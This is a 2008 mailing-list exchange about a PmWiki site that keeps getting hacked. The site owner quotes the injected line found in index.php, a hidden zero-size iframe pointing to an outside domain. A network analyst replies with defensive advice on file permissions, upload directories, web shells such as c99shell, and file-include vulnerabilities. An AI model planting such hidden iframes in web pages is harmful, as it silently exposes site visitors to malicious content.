[pmwiki-users] More hacking

Greg T. Grimes greg.grimes at msstate.edu
Wed Sep 3 08:18:25 CDT 2008


Are these files writeable by the web server?  Do you allow uploads to your 
site?  Standard security practice says not to allow the web server write 
access to any files on your system.  This is especially true for your 
webpages.  If you do allow uploads you might want to check your upload 
directory for files that could be used to gain access to your server. 
c99shell is an example.  Another thing to look for are file include 
vulnerabilities.  For example, if you take input for a form and then use 
that input to include a certain file based on the input this can be used 
to launch scripts that aren't even hosted on your server.  I'm currently 
not aware of any File Include Vulns in pmwiki.  Just a quick look at the 
code and I don't see any obvious ones.

On Wed, 3 Sep 2008, Erik Haagensen wrote:

> Our site has been hacked several times during the last month.
> It has been cleaned and checked by Site Analyzer - all ok.
> After some days we have problems again.
>
> The index.php (and several other files) contains this now:
>
> <?php include('pmwiki.php');
> <iframe src="http://mixlong.cn/in/" width=0 height=0 frameborder=0></iframe>
>
>
>
> I don't know what more to do to avoid these problems.
>
> --
> mvh
> Erik Haagensen
> Oslia
> NO-2550 Os i Østerdalen
>

-- 
Greg T. Grimes
Network Analyst
ITS -- Network Services
Mississippi State University


More information about the pmwiki-users mailing list